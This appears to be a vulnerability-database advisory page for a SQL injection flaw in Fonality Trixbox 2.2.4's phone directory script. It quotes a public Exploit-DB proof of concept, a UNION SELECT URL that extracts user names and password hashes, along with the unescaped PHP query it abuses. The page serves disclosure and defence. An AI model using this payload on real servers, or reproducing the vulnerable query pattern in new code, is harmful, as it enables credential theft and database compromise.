CVE-2010-0702

high

Published 2010-02-23 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

8.5

Description

SQL injection vulnerability in cisco/services/PhonecDirectory.php in Fonality Trixbox 2.2.4 allows remote attackers to execute arbitrary SQL commands via the ID parameter.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-11508 webapps php text · 1 KB

NorSlacker · 2010-02-19

Fonality trixbox 2.2.4 - 'PhonecDirectory.php' SQL Injection

text exploit Source: Exploit-DB

# Software Link: http://trixbox.org/downloads
# Version: 2.2.4
# Code : 
http://server/cisco/services/PhoneDirectory.php?ID=1 [SQL INJECTION]

Example (Grab users / password hashes from sugarcrm) 
http://server/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1' GROUP BY 'id


PhoneDirectory.php vulnerable code:
# If the variable "ID" is passed in through the GET string, then display
# extension, phone number and cell phone number for that record with the dial
# key functionality
if ($ID) {
 $PersonDirectoryListing = "<CiscoIPPhoneDirectory>\n";

 $Query = "SELECT id, first_name, last_name, phone_home, phone_work, phone_mobile, phone_other ";
 $Query .= "FROM contacts WHERE id = '$ID' ";
 $Query .= "ORDER BY last_name ";
 $SelectPersonInfo = mysql_query($Query,$ConnectionSuccess);

 ...

}

#norslacker [at] gmail [dot] com

Application impact

Vendor	Product	Versions	Fixed
netfortris	trixbox	`2.2.4`

References

CWEs

CWE-89

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.